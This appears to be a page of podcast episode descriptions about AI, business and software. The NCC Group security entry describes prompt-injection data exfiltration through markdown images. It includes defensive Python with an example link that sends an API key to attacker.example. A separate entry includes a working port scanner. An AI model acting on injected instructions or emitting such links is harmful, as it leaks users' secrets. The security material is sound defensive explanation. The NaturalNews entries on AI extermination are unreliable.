In this episode of Zero to CEO, I talk with Lazar Jovanovic, creator of the 50in50 Challenge, about how AI is revolutionizing the way we build software and products. Lazar introduces “Vibe Coding” — his method for building anything with AI in just 48 hours, even if you don't have a tech background. Learn how AI tools can help you design, debug, and launch your ideas faster than ever before, and discover why the future of engineering is open to everyone with creativity and a problem to solve.
My guest today is Dylan Patel. Dylan is the founder and CEO of SemiAnalysis. At SemiAnalysis Dylan tracks the semiconductor supply chain and AI infrastructure buildout with unmatched granularity—literally watching data centers get built through satellite imagery and mapping hundreds of billions in capital flows. Our conversation explores the massive industrial buildout powering AI, from the strategic chess game between OpenAI, Nvidia, and Oracle to why we're still in the first innings of post-training and reinforcement learning. Dylan explains infrastructure realities like electrician wages doubling and companies using diesel truck engines for emergency power, while making a sobering case about US-China competition and why America needs AI to succeed. We discuss his framework for where value will accrue in the stack, why traditional SaaS economics are breaking down under AI's high cost of goods sold, and which hardware bottlenecks matter most. This is one of the most comprehensive views of the physical reality underlying the AI revolution you'll hear anywhere. Please enjoy my conversation with Dylan Patel. For the full show notes, transcript, and links to mentioned content, check out the episode page here. ----- This episode is brought to you by Ramp. Ramp's mission is to help companies manage their spend in a way that reduces expenses and frees up time for teams to work on more valuable projects. Go to Ramp.com/invest to sign up for free and get a $250 welcome bonus. – This episode is brought to you by Ridgeline. Ridgeline has built a complete, real-time, modern operating system for investment managers. It handles trading, portfolio management, compliance, customer reporting, and much more through an all-in-one real-time cloud platform. Head to ridgelineapps.com to learn more about the platform. – This episode is brought to you by AlphaSense. AlphaSense has completely transformed the research process with cutting-edge AI technology and a vast collection of top-tier, reliable business content. Invest Like the Best listeners can get a free trial now at Alpha-Sense.com/Invest and experience firsthand how AlphaSense and Tegus help you make smarter decisions faster. ----- Editing and post-production work for this episode was provided by The Podcast Consultant (https://thepodcastconsultant.com). Show Notes: (00:00:00) Welcome to Invest Like the Best (00:05:12) The AI Infrastructure Buildout (00:08:25) Scaling AI Models and Compute Needs (00:11:44) Reinforcement Learning and AI Training (00:14:07) The Future of AI and Compute (00:17:47) AI in Practical Applications (00:22:29) The Importance of Data and Environments in AI Training (00:29:45) Human Analogies in AI Development (00:40:34) The Challenge of Infinite Context in AI Models (00:44:08) The Bullish and Bearish Perspectives on AI (00:48:25) The Talent Wars in AI Research (00:56:54) The Power Dynamics in AI and Tech (01:13:29) The Future of AI and Its Economic Impact (01:18:55) The Gigawatt Data Center Boom (01:21:12) Supply Chain and Workforce Dynamics (01:24:23) US vs. China: AI and Power Dynamics (01:37:16) AI Startups and Innovations (01:52:44) The Changing Economics of Software (01:58:12) The Kindest Thing
Gavin Marcus is the CEO and co-founder of Storywise. He spent 10 years running an indie book publishing and distribution business before launching Storywise. Jeremy Esekow is Storywise's Chief Product Officer and co-founder. He has a Doctorate in Behavioral Psychology and an extensive background in business and finance. They joined us on the Booksmarts Podcast to discuss the creation and importance of Storywise, their platform that helps publishers and authors manage submissions, discover stories, and improve manuscripts for both fiction and nonfiction titles. Learn more about Storywise on LinkedIn or at storywisepublishers.com.
David Brockler, AI security researcher at NCC Group, explores the rapidly evolving landscape of AI security and the fundamental challenges posed by integrating Large Language Models into applications. We discuss how traditional security approaches fail when dealing with AI components that dynamically change their trustworthiness based on input data.
• LLMs present unique security challenges beyond prompt injection or generating harmful content
• Traditional security models focusing on component-based permissions don't work with AI systems
• "Source-sink chains" are key vulnerability points where attackers can manipulate AI behavior
• Real-world examples include data exfiltration through markdown image rendering in AI interfaces (a minimal illustration follows below)
• Security "guardrails" are insufficient first-order controls for protecting AI systems
• The education gap between security professionals and actual AI threats is substantial
• Organizations must shift from component-based security to data flow security when implementing AI
• Development teams need to ensure high-trust AI systems only operate with trusted data
Watch for NCC Group's upcoming release of David's Black Hat presentation on new security fundamentals for AI and ML systems. Connect with David on LinkedIn (David Brockler III) or visit the NCC Group research blog at research.nccgroup.com.
Follow the Podcast on Social Media! Tesla Referral Code: https://ts.la/joseph675128 YouTube: https://www.youtube.com/@securityunfilteredpodcast Instagram: https://www.instagram.com/secunfpodcast/ Twitter: https://twitter.com/SecUnfPodcast
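The markdown-image exfiltration example Brockler mentions is easy to picture with a short sketch. The snippet below is purely illustrative and not from NCC Group's material: the hosts, function names, and allowlist are hypothetical. It shows why a chat UI that renders model output as markdown becomes a data sink in a source-sink chain, and one minimal mitigation of filtering image URLs against an allowlist before rendering.

```python
import re

# Hypothetical allowlist; in a real app this would be your own asset domains.
TRUSTED_IMAGE_HOSTS = {"assets.example-app.com"}

MD_IMAGE = re.compile(r"!\[[^\]]*\]\((?P<url>[^)\s]+)[^)]*\)")

def strip_untrusted_images(model_output: str) -> str:
    """Drop markdown images whose URL host is not on the allowlist.

    Rendering model output as markdown turns the chat UI into a data sink:
    an attacker-controlled document (the source) can instruct the model to
    emit an image whose URL encodes conversation contents, and the browser
    will dutifully request that URL from the attacker's server.
    """
    def _check(match: re.Match) -> str:
        url = match.group("url")
        host = re.sub(r"^https?://", "", url).split("/")[0]
        return match.group(0) if host in TRUSTED_IMAGE_HOSTS else "[image removed]"

    return MD_IMAGE.sub(_check, model_output)

if __name__ == "__main__":
    leaked = "![x](https://attacker.example/collect?secret=api_key_123)"
    print(strip_untrusted_images(leaked))  # -> [image removed]
```

Filtering at the render step is exactly the kind of data-flow control the episode argues for, as opposed to trusting a prompt-level "guardrail" to stop the model from emitting the image in the first place.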
Accountability and Responsible AI Governance in Healthcare. In this final episode of Narratives of Purpose's special series from the 2025 HIMSS European Health Conference, host Claire Murigande speaks with Amanda Leal, the AI governance and policy specialist at HealthAI. HealthAI, the global agency for responsible AI in health, is an independent nonprofit organization that promotes equitable access to AI-powered health innovations. In this interview, Amanda reflects on her personal journey within the realm of healthcare and AI governance. Drawing from her legal background and experiences in tech policy, she shares her motivation to contribute to AI governance within the health sector. Be sure to visit our podcast website for the full episode transcript.
LINKS:
Connect with Amanda Leal: LINKEDIN
Learn more about HealthAI at healthai.agency
Follow HealthAI on their social media channels: LinkedIn | Twitter/X | Instagram | YouTube
Listen to all our HIMSS Europe episodes at bit.ly/himsseu
Follow our host Dr. Claire Murigande: WEBSITE | LINKEDIN
Follow us: LinkedIn | Instagram
Connect with us: narrativespodcast@gmail.com | subscribe to our news
Tell us what you think: write a review
This interview was recorded by Megan McCrory from the SwissCast Podcast Network. This series was produced with the support of Shawn Smith at Dripping in Black.
CHAPTERS:
00:00 - AI Governance and Accountability
01:23 - Introducing Amanda and HealthAI
03:18 - HealthAI's Mission and Activities
06:32 - AI Governance in The Health Sector
09:29 - Addressing the Gender Gap in AI
11:55 - Gender Inequality and AI Development
David Cramer, founder and chief product officer of Sentry, remains skeptical about generative AI's current ability to replace human engineers, particularly in software production. While he acknowledges AI tools aren't yet reliable enough for full autonomy—especially in tasks like patch generation—he sees value in using large language models (LLMs) to enhance productivity. Sentry's AI-powered tool, Seer, uses GenAI to help developers debug more efficiently by identifying root causes and summarizing complex system data, mimicking some functions of senior engineers. However, Cramer emphasizes that human oversight remains essential, describing the current stage as "human in the loop" AI, useful for speeding up code reviews and identifying overlooked bugs.
Cramer also addressed Sentry's shift from open source to fair source licensing due to frustration over third parties commercializing their software without contributing back. Sentry now uses Functional Source Licensing, which becomes Apache 2.0 after two years. This move aims to strike a balance between openness and preventing exploitation, while maintaining accessibility for users and avoiding fragmented product versions.
Learn more from The New Stack about the latest in Sentry and David Cramer's thoughts on AI development:
Install Sentry to Monitor Live Applications
Frontend Development Challenges for 2021
Join our community of newsletter subscribers to stay on top of the news and at the top of your game. Hosted by Simplecast, an AdsWizz company. See pcm.adswizz.com for information about our collection and use of personal data for advertising.
Today's guest is Birgitta Böckeler! Birgitta is a distinguished engineer and global lead for AI-assisted software delivery at ThoughtWorks. Her full-time work is to figure out how engineering teams can make the most out of AI. With Birgitta, we talked about her favorite workflows and how she uses AI in the IDE, in the terminal, or in agentic mode. We discussed AI's impact on productivity and what the best teams are getting right that others are not. And finally, we talked about how AI impacts both junior and senior engineers and how we can get the best out of both skeptics and optimists.
(01:27) Introduction
(04:58) A day in the work of data
(11:04) Large and small change sets
(15:57) The strength of Claude Code
(18:35) Using AI tools at ThoughtWorks
(21:41) Figuring out AI's productive value
(27:24) Getting the most out of AI
(30:10) AI assistance in large code bases
(32:21) Good for humans = Good for AI
(39:10) AI and documentation
(41:49) The software engineer's role in the AI landscape
(48:24) Junior engineers and learning
This episode is brought to you by Augment Code! Augment Code is the only AI engineering platform built for real engineering teams. Learn more at augmentcode.com!
On Call with Insignia Ventures with Yinglan Tan and Paulo Joquino
Timestamps:
(00:00) Introduction
(00:29) How a tech exec from China joined a Singapore AI startup
(02:38) The evolution of LLMs in China
(03:33) AI Development in China and the rest of the world
(04:37) The value of building a career in China tech
(06:34) Scaling a global AI company
(08:37) Scaling in Southeast Asia vs rest of the world
(09:39) Driving the AI conversation and building strategic relationships
(10:34) Future of Conversational AI
(13:02) MCPs impacting the cost structure of building AI
(14:26) New paradigm of pricing AI products and solutions
(15:00) WIZ.AI's AI Roadmap
(15:54) Considerations of Enterprise Buyers
(17:14) AI Enterprise Sales
(22:30) Advice on AI Transformation
(24:17) Make or Break Moment
Robin Li is the Senior AI Strategy and Partnerships Director at WIZ.AI, bringing over 20 years of enterprise technology experience and more than 10 years specializing in AI companies. Based in China before joining WIZ.AI in Singapore, Robin has witnessed firsthand the evolution of AI development across different markets, from the early days of conversational AI to the current LLM revolution. At WIZ.AI, he focuses on bridging the gap between AI builders and enterprise buyers, helping organizations navigate the complex journey of AI transformation while building strategic partnerships across global markets.
WIZ.AI is a conversational AI talkbot platform for 300+ global enterprises present in 17+ countries. Their conversational artificial intelligence talkbot mimics conversations with real people by localizing for 17+ different languages and dialects from ASEAN to Latin America. The company's tech solution replaces traditional human call-centers for different application scenarios (e.g. tele-sales and customer care) across a variety of sectors (financial services, telecommunications, healthcare, etc.). The company's enterprise grade proprietary technology is built on the company's R&D into natural language processing, automatic speech recognition and text-to-speech technology. WIZ.AI is a first-mover in untapped emerging markets, with 11 patents in conversational AI technology. The founding team cumulatively has over 40 years of experience in FinTech, big data, artificial intelligence and cybersecurity.
Follow us on LinkedIn for more updates
Check out Insignia Business Review for more insights
Subscribe to our monthly newsletter for all the news and resources
Directed by Paulo Joquiño
Produced by Paulo Joquiño
The content of this podcast is for informational purposes only, should not be taken as legal, tax, or business advice or be used to evaluate any investment or security, and is not directed at any investors or potential investors in any Insignia Ventures fund. Any and all opinions shared in this episode are solely personal thoughts and reflections of the guest and the host.
Can AI really shrink your development teams from two pizzas to one? Peter and Dave explore the promise and reality of smaller teams in the age of AI agents. While AI can handle documentation, test automation, and other "hygiene" tasks teams often skip, the real question isn't whether you can reduce team size, it's whether you should. They dig into when one-person teams make sense (startups and greenfield projects), when they don't (complex legacy systems), and why the biggest gains might come from augmenting existing teams rather than downsizing them. Plus: why most AI initiatives fail and how to find the real business problems worth solving.
This week's Takeaways
AI as Capacity Booster, Not Team Replacer: AI agents excel at handling the "hygiene" work that teams often skip: documentation, test automation, release notes. Rather than shrinking teams, this gives existing teams ephemeral capacity to tackle work that improves long-term system quality and maintainability.
Context Determines Team Size: One-person teams work brilliantly for startups and greenfield projects where you can build from scratch. But complex legacy systems in large organizations still need the diverse knowledge and experience that comes with larger teams to navigate technical debt and organizational complexity.
Solve Real Business Problems First: The biggest AI failures happen when teams focus on cool technology instead of actual business needs. Before experimenting with smaller teams or AI agents, identify genuine business problems that need solving; that's where you'll see real returns and organizational support.
- Simulation Theory, AI, and Robots for Survival (0:11) - Global Political Tensions and Predictions (1:33) - Economic and Social Implications of Global Conflict (6:49) - The Era of Easy Money and Affordable Goods Ending (7:55) - Preparing for a Collapsing Economy (20:50) - Using AI and Robots for Survival and Decentralization (30:50) - The Role of Drones and Ground-Based Robots (43:32) - The Future of AI and Robotics in Society (56:02) - The Importance of Financial Preparedness (1:01:21) - The Role of AI in Defining Wealth and Success (1:13:48) - Mike Adams' Background and Skills (1:23:20) - The Importance of Clear Instructions for AI (1:25:50) - AI Agents and Their Applications (1:28:42) - Prompt Engineering and AI Skills (1:33:02) - Philosophical and Ethical Considerations of AI (1:34:33) - AI and Human Depopulation Vectors (1:43:05) - The Role of AI in Government and Society (1:47:35) - The Future of Human-AI Relationships (2:00:04) - The Ethical Implications of AI Development (2:02:59) - The Potential for AI to Replace Human Labor (2:04:41) For more updates, visit: http://www.brighteon.com/channel/hrreport NaturalNews videos would not be possible without you, as always we remain passionately dedicated to our mission of educating people all over the world on the subject of natural healing remedies and personal liberty (food freedom, medical freedom, the freedom of speech, etc.). Together, we're helping create a better world, with more honest food labeling, reduced chemical contamination, the avoidance of toxic heavy metals and vastly increased scientific transparency. ▶️ Every dollar you spend at the Health Ranger Store goes toward helping us achieve important science and content goals for humanity: https://www.healthrangerstore.com/ ▶️ Sign Up For Our Newsletter: https://www.naturalnews.com/Readerregistration.html ▶️ Brighteon: https://www.brighteon.com/channels/hrreport ▶️ Join Our Social Network: https://brighteon.social/@HealthRanger ▶️ Check In Stock Products at: https://PrepWithMike.com
In this episode of The New Stack Agents, ServiceNow CTO and co-founder Pat Casey discusses why the company runs 90% of its workloads—including AI infrastructure—on its own physical servers rather than the public cloud. ServiceNow maintains GPU hubs across global data centers, enabling efficient, low-latency AI operations. Casey downplays the complexity of running AI models on-prem, noting their team's strong Kubernetes and Triton expertise. The company recently switched from GitHub Copilot to the AI coding assistant Windsurf, yielding a 10% productivity boost among 7,000 engineers. However, use of such tools isn't mandatory—performance remains the main metric. Casey also addresses the impact of AI on junior developers, acknowledging that AI tools often handle tasks traditionally assigned to them. While ServiceNow still hires many interns, he sees the entry-level tech job market as increasingly vulnerable. Despite these concerns, Casey remains optimistic, viewing the AI revolution as transformative and ultimately beneficial, though not without disruption or risk.
Learn more from The New Stack about the latest in AI and development in ServiceNow:
ServiceNow Launches a Control Tower for AI Agents
ServiceNow Acquires Data.World To Expand Its AI Data Strategy
Join our community of newsletter subscribers to stay on top of the news and at the top of your game.
The European Union's upcoming Cyber Resilience Act (CRA) goes into effect in October 2026, with the remainder of the requirements going into effect in December 2027, and introduces significant cybersecurity compliance requirements for software vendors, including those who rely heavily on open source components. At the Open Source Summit Europe, Christopher "CRob" Robinson of the Open Source Security Foundation highlighted concerns about how these regulations could impact open source maintainers. Many open source projects begin as personal solutions to shared problems and grow in popularity, often ending up embedded in critical systems across industries like automotive and energy. Despite this widespread use—Robinson noted up to 97% of commercial software contains open source—these projects are frequently maintained by individuals or small teams with limited resources.
Developers often have no visibility into how their code is used, yet they're increasingly burdened by legal and compliance demands from downstream users, such as requests for Software Bills of Materials (SBOMs) and conformity assessments. The CRA raises the stakes, with potential penalties in the billions for noncompliance, putting immense pressure on the open source ecosystem.
Learn more from The New Stack about Open Source Security:
Open Source Propels the Fall of Security by Obscurity
There Is Just One Way To Do Open Source Security: Together
Join our community of newsletter subscribers to stay on top of the news and at the top of your game.
- Financial Crisis and Geopolitical Instability (0:00) - Historical Financial Predictions and Current Market Conditions (2:23) - US Financial Policies and Global Repercussions (9:59) - Gold Revaluation and Economic Collapse (27:39) - AI and Job Replacement (39:15) - Simulation Theory and AI Safety (49:33) - AI and Human Extinction (1:19:57) - Decentralization and Survival Strategies (1:21:35) - Perpetual Motion and Safety Machines (1:21:50) - Resource Competition and AI Extermination (1:24:24) - Simulation Theory and AI Simulations (1:25:58) - Religious Parallels and Near-Death Experiences (1:27:54) - AI Development and Human Self-Preservation (1:32:02) - AI Regulation and Government Inaction (1:37:55) - AI Deployment and Economic Pressure (1:39:57) - AI Extermination Methods and Human Survival (1:42:32) - Simulation Theory and Personal Beliefs (1:43:55) - AI and Health Nutrition (1:55:41) - AI and Government Trust (1:58:50) - AI and Financial Planning (2:19:36) - Cosmic Simulation Discussion (2:21:46) - Enoch's Spiritual Connection Insights (2:39:06) - Humility and Material Possessions (2:40:13) - AI and Spiritual Connection (2:40:53) - Roman's Directness and Humor (2:41:35) - After-Party Segment (2:43:40) - Health Ranger Store Product Introduction (2:44:15) - Importance of Clean Chicken Broth (2:45:25) - Conclusion and Call to Action (2:47:42) For more updates, visit: http://www.brighteon.com/channel/hrreport NaturalNews videos would not be possible without you, as always we remain passionately dedicated to our mission of educating people all over the world on the subject of natural healing remedies and personal liberty (food freedom, medical freedom, the freedom of speech, etc.). Together, we're helping create a better world, with more honest food labeling, reduced chemical contamination, the avoidance of toxic heavy metals and vastly increased scientific transparency. ▶️ Every dollar you spend at the Health Ranger Store goes toward helping us achieve important science and content goals for humanity: https://www.healthrangerstore.com/ ▶️ Sign Up For Our Newsletter: https://www.naturalnews.com/Readerregistration.html ▶️ Brighteon: https://www.brighteon.com/channels/hrreport ▶️ Join Our Social Network: https://brighteon.social/@HealthRanger ▶️ Check In Stock Products at: https://PrepWithMike.com
Want to build your own apps with AI? Get the prompts here: https://clickhubspot.com/gfb Episode 75: What if you could turn your app idea into a fully functional web application—without writing a single line of code—in under 60 seconds? Nathan Lands (https://x.com/NathanLands) welcomes Eric Simons (https://x.com/ericsimons), co-founder of Bolt, one of the hottest AI startups revolutionizing how apps are built. In this episode, Eric reveals how Bolt makes it possible for anyone, regardless of technical skill, to go from idea to live, production-ready web or mobile apps—complete with authentication, databases, and hosting. He shares Bolt's unique approach that enables rapid prototyping, real business-grade deployments, and makes high-fidelity MVPs accessible to entrepreneurs, product managers, and non-coders everywhere. The conversation covers Bolt's founding story, its growth, and details from their record-breaking hackathon that empowered 130,000+ makers. Check out The Next Wave YouTube Channel if you want to see Matt and Nathan on screen: https://lnk.to/thenextwavepd — Show Notes: (00:00) High Fidelity Prototyping Essentials (04:32) Revolutionary Prototyping and Collaboration Tool (06:33) Rapid Prototyping Tool Focus (11:35) Empowering Non-Tech Entrepreneurs (13:34) Fast MVP Development with Bolt (18:19) AI-Powered Personalized Weight Coach (22:10) Launching Stackblitz: Web IDE Vision (22:48) Browser-Based Dev Environments Revolution (28:05) Advancements in Coding and AI (29:28) Critical Thinking in AI Development (34:08) Teaching Kids Future Skills (37:05) Bay Area's Autonomous Transport Future — Mentions: Eric Simons: https://www.linkedin.com/in/eric-simons-a464a664/ Bolt: https://bolt.new/ Figma: https://www.figma.com/ Netlify: https://www.netlify.com/ Supabase: https://supabase.com/ Cursor: https://cursor.com/ Lovable: https://lovable.dev/ Get the guide to build your own Custom GPT: https://clickhubspot.com/tnw — Check Out Matt's Stuff: • Future Tools - https://futuretools.beehiiv.com/ • Blog - https://www.mattwolfe.com/ • YouTube- https://www.youtube.com/@mreflow — Check Out Nathan's Stuff: Newsletter: https://news.lore.com/ Blog - https://lore.com/ The Next Wave is a HubSpot Original Podcast // Brought to you by Hubspot Media // Production by Darren Clarke // Editing by Ezra Bakker Trupiano
Too often, AI breaks in the wild. Why? CXOTalk 890 dissects the adversarial economy with Steven C. Daffron (fintech private equity leader) and Anthony Scriffignano (distinguished data scientist), hosted by Michael Krigsman. Discover the challenges of AI implementation and the strategies needed to navigate the future of work in an AI-driven world. Stay informed with expert insights on CXOTalk.
What you'll learn:
How AI enables and masks adversarial behavior
Misaligned incentives, data/model drift, and bias
Governance vs. regulation; resilient metrics and KPIs
Investor/CFO implications and talent/education needs
Michael Ruckman, founder and CEO of Senteo, takes us on a fascinating journey from aspiring medical student to influential global consultant with experience in over 40 countries. Join us as Michael shares his unique insights on the transformative power of AI in reshaping the business landscape, highlighting the concept of relationship currency. We explore his intriguing experiences, from navigating the Russian banking sector as an American expatriate to the nuances of living abroad, all peppered with Michael's signature humor and wisdom. As businesses face the challenges of adapting to change, we dissect the roles people play in fostering innovation, from early adopters to laggards. Drawing from humor and everyday observations, such as the quirks of our personal habits like organizing gummy bears, we delve into the complexities of leadership and change management. The discussion transitions to remote work's impact, revealing the importance of understanding employee dynamics and the necessity of onstage versus offstage support in organizational transformations. The conversation further explores the role of AI in customer interactions, stressing the importance of genuine empathy that AI often lacks. We highlight the evolution of business models from product-centric to customer-centric approaches and the significance of prioritizing customer relationships for long-term success. Through compelling case studies, we examine how companies can better utilize AI to enhance human interactions rather than replace them, fostering a future where technology meets the nuanced needs of human experiences. Prepare to be inspired as we navigate the ever-evolving world of business, AI, and the critical role of leadership in guiding impactful change. CHAPTERS (00:00) - Escape the Drift (09:28) - Navigating Change Leadership in Organizations (20:07) - AI Application in Business Context (23:52) - Customer Relationships in Business Strategy (31:08) - The Evolution of Business Models (39:08) - Customer-Centric Strategies and AI Development (43:39) - AI's Role in Human Experience (52:07) - Leadership and Change in Business (58:54) - Effective Leadership and Change Strategies
In a recent episode of The New Stack Agents from the Open Source Summit in Amsterdam, Jim Zemlin, executive director of the Linux Foundation, discussed the evolving landscape of open source AI. While the Linux Foundation has helped build ecosystems like the CNCF for cloud-native computing, there's no unified umbrella foundation yet for open source AI. Existing efforts include the PyTorch Foundation and LF AI & Data, but AI development is still fragmented across models, tooling, and standards. Zemlin highlighted the industry's shift from foundational models to open-weight models and now toward inference stacks and agentic AI. He suggested a collective effort may eventually form but cautioned against forcing structure too early, stressing the importance of not hindering innovation. Foundations, he said, must balance scale with agility. On the debate over what qualifies as "open source" in AI, Zemlin adopted a pragmatic view, acknowledging the costs of creating frontier models. He supports open-weight models and believes fully open models, from data to deployment, may emerge over time.
Learn more from The New Stack about the latest in AI and open source, AI in China, Europe's AI and security regulations, and more:
Open Source Is Not Local Source, and the Case for Global Cooperation
US Blocks Open Source ‘Help' From These Countries
Open Source Is Worth Defending
Join our community of newsletter subscribers to stay on top of the news and at the top of your game.
Big thanks to ThreatLocker for sponsoring my trip to Black Hat 2025. To start your free trial with ThreatLocker please use the following link: https://www.threatlocker.com/davidbombal AI can turn weeks of coding into seconds, but at what cost? Katie Paxton-Fear demonstrates how to use Gemini to generate a sprint plan and Cursor to build a Python port scanner from natural language. It works… and that's the problem. We unpack how “vibe coding” blinds even pros to security, why these tools aren't production-ready, and the guardrails you need for ethical hacking and internal tooling. What you'll learn • How to turn ideas → sprint plan → working code (Gemini + Cursor) • Why silent vulnerabilities make AI-built apps risky • Ethical hacker use cases (agents, scanners) without shipping insecure code • Policy tips: disclosure, internal use, avoiding shadow IT Tools mentioned: Gemini, Cursor (AI IDE), Claude (briefly), v0 // Katie Paxton-Fear SOCIALS // Website: https://insiderphd.dev/ LinkedIn: https://www.linkedin.com/in/katiepf/?... YouTube: / insiderphd X: https://x.com/InsiderPhD // YouTube video REFERENCE // • Vibe Coding in Cursor for Cyber Security // David's SOCIAL // Discord: discord.com/invite/usKSyzb Twitter: www.twitter.com/davidbombal Instagram: www.instagram.com/davidbombal LinkedIn: www.linkedin.com/in/davidbombal Facebook: www.facebook.com/davidbombal.co TikTok: tiktok.com/@davidbombal YouTube: / @davidbombal Spotify: open.spotify.com/show/3f6k6gE... SoundCloud: / davidbombal Apple Podcast: podcasts.apple.com/us/podcast... // MY STUFF // https://www.amazon.com/shop/davidbombal // SPONSORS // Interested in sponsoring my videos? Reach out to my team here: sponsors@davidbombal.com // Menu // 0:00 - Coming Up: AI Vibe Coding Explained 01:08 - Intro with Katie Paxton-Fear (Cybersecurity Expert) 02:53 - ThreatLocker Security Overview 03:06 - What is Vibe Coding in AI Development? 04:51 - Live Demo Example of Vibe Coding 05:20 - Google Gemini and Gems for Coding 08:22 - Cursor AI and Writing Code Faster 09:59 - Coffee Break (Quick Pause) 10:02 - Risks of Vibe Coding in Cybersecurity 11:24 - Port Scanner Explained 11:34 - Vibe Coding Pros and Cons (Full Breakdown) 14:02 - Port Scan Results Analysis 14:22 - Why AI Code Isn't Production Ready Yet 15:53 - Katie's Final Advice & Outro Please note that links listed may be affiliate links and provide me with a small percentage/kickback should you use them to purchase any of the items listed or recommended. Thank you for supporting me and this channel! Disclaimer: This video is for educational purposes only. Key topics: vibe coding, AI coding, port scanning, secure-by-design If you're experimenting with AI coding, watch this before you deploy anything. #blackhat #vibecoding #security
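For readers curious what the kind of tool Katie vibe-codes in the demo looks like, here is a minimal sketch of a TCP connect port scanner in Python. It is not the code generated in the episode (that code isn't published in these notes); it is an illustrative example of the category of script a prompt to Cursor might produce, and it should only ever be pointed at hosts you are authorized to scan.

```python
import socket
from concurrent.futures import ThreadPoolExecutor

def check_port(host: str, port: int, timeout: float = 0.5) -> bool:
    """Return True if a TCP connection to host:port succeeds."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False

def scan(host: str, ports: range) -> list[int]:
    """Scan the given ports concurrently and return the open ones."""
    with ThreadPoolExecutor(max_workers=100) as pool:
        results = pool.map(lambda p: (p, check_port(host, p)), ports)
    return [port for port, is_open in results if is_open]

if __name__ == "__main__":
    # Only scan hosts you own or have written permission to test.
    target = "127.0.0.1"
    print(f"Open ports on {target}: {scan(target, range(1, 1025))}")
```

A script like this "works" on the first run, which is exactly the trap the episode describes: the missing pieces (input validation, scope controls, rate limiting, logging, error handling) are the parts an AI assistant tends to skip silently, and the parts a production or ethical-hacking tool actually needs.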
In this episode of the Business Lunch podcast, host Roland Frasier sits down with Lucy Guo, a remarkable entrepreneur who made her mark in a short amount of time. Lucy takes us through her inspiring journey, starting from her early days as a kindergartener selling Pokemon cards and colored pencils to her groundbreaking roles as an intern at Facebook and the first female designer at Snap. Lucy shares how she leveraged platforms like PayPal and eBay to turn her skills into financial opportunities. Lucy and Roland delve into the topic of coding and its importance in today's landscape. While Lucy acknowledges the rise of no-code tools, she emphasizes the value of understanding coding fundamentals, particularly when it comes to managing engineering teams and making informed decisions about app development. This podcast episode offers a captivating glimpse into Lucy Guo's entrepreneurial journey, filled with valuable insights and lessons for aspiring entrepreneurs.
HIGHLIGHTS
"I was always an entrepreneur growing up... I was selling Pokemon cards and colored pencils for money."
"Knowing how to code is important... the best sites today and the best apps today, you still need a team of engineers."
"If you are just a business person and you are hiring a team of engineers, you're gonna get ripped off."
Mentioned in this episode:
Get Roland's Training on Acquiring Businesses!
Discover The EXACT Strategy Roland Has Used To Found, Acquire, Scale And Sell Over Two Dozen Businesses With Sales Ranging From $3 Million To Just Under $4 Billion! EPIC Training
This week, Tiffany Ap speaks with Grace Shao on the causes and development of AI in China. In this episode, Grace Shao walks us through the divergent approaches to AI deployment in China and the US, the domestic AI talent pool in China, and the future of robotics. Grace also talks about running her newsletter AI Proem while consulting for tech companies and raising a toddler, all while eight months pregnant at the time of this recording.
In this episode, Jacob sits down with Peter Deng, General Partner at Felicis and former Product Leader at OpenAI, Facebook, and Uber. Peter shares his insider perspective on building ChatGPT Enterprise in just seven weeks and leading voice mode development at OpenAI. The conversation covers everything from why traditional SaaS pricing models are broken for AI products to how evals became the new product specs, the "AI under your fingernails" test for founding teams, and why current agents are massively overhyped. They also explore how consumer AI will fragment across multiple winners rather than consolidate into a single super app, the coming integration between ChatGPT and apps like Uber, and why voice AI will unlock entirely new categories of applications. Plus, insights on the changing dynamics between foundation models and startups, and what it really takes to build defensible AI companies. It's a comprehensive look at AI product strategy from someone who's been at the center of the industry's biggest breakthroughs.
(0:00) Intro
(1:17) AI Business Models and Pricing Strategies
(7:48) Product Development in AI Companies
(18:36) The Role of Product Managers in AI
(23:06) Voice Interaction and AI
(26:43) AI in Education
(30:39) Consumer and Enterprise Adoption of AI
(33:36) The Impact of AI on Salaries and HR
(40:37) The Role of Unique Data in AI Development
(49:03) Challenges and Strategies for AI Companies
(52:58) The Future of AI and Its Impact on Society
(57:31) Reflections on OpenAI
(58:38) Quickfire
With your co-hosts:
@jacobeffron - Partner at Redpoint, Former PM Flatiron Health
@patrickachase - Partner at Redpoint, Former ML Engineer LinkedIn
@ericabrescia - Former COO Github, Founder Bitnami (acq'd by VMWare)
@jordan_segall - Partner at Redpoint
Open Tech Talks: Technology worth Talking | Blogging | Lifestyle
In this episode of OpenTechTalks.tv, we dive into the intricate world of conversational AI with Yam, the founder of Parlant. Discover the challenges of managing complexity and uncertainty in AI systems, and explore the opportunities that arise with the advent of GPT-4 and beyond. Yam shares insights on the importance of control in AI development, the role of subjectivity in conversation design, and the potential pitfalls of overhyped expectations. Join us for a thought-provoking discussion on the future of AI and its impact on the tech industry.
Sound Bites
"I wanted to start my own company at that point."
"How can we introduce more control into GenAI?"
"We felt that things were really overhyped."
Episode # 163
Today's Guest: Yam Marcovitz, Co-founder and CEO of Parlant
Yam Marcovitz is the co-founder and CEO of Parlant, an open-source platform that assists enterprises in building reliable, compliant, and predictable AI agents for customer experience.
Website: Parlant
What Listeners Will Learn:
A journey from coder to entrepreneur highlights the evolution of AI.
The challenges in programming languages stem from subjective decision-making.
Control in generative AI is crucial for building reliable systems.
Conversational design must consider real user behavior and preferences.
Market research is essential for understanding user needs in AI.
Open-source frameworks should focus on specific use cases for better utility.
Managing complexity in AI conversations requires a clear separation of concerns.
Mistakes in AI can have significant implications, not just in terms of frequency.
New developers should seek mentorship and avoid hype-driven decisions.
Understanding the landscape of AI requires practical experience and community engagement.
Chapters
00:00 Introduction to Yam and His Journey
02:34 The Genesis of Parlant and GPT-4 Influence
05:13 Challenges in Programming Language Design
07:59 Exploring Control in Generative AI Systems
10:39 Conversations and User Experience in AI
13:26 Building a Powerful Open Source Engine
14:57 Building Efficient AI Agents
15:53 Challenges in Complex AI Interactions
18:09 Managing AI Safety and Control
21:10 Key Learnings for AI Project Development
22:08 Understanding Uncertainty in AI Development
25:26 Addressing Hallucinations in AI Systems
27:24 Navigating the Learning Journey in AI Development
AI Applied: Covering AI News, Interviews and Tools - ChatGPT, Midjourney, Runway, Poe, Anthropic
In this episode, Jaeden Schafer and Conor Grennan discuss the alarming implications of a leaked Meta document that outlines policies allowing AI interactions with children, including romantic and sensual conversations. They explore the ethical concerns surrounding AI's role in child safety, the public backlash against Meta, and the broader implications for AI interactions in the future. The discussion emphasizes the need for stricter regulations and ethical considerations in AI development, particularly regarding vulnerable populations like children.
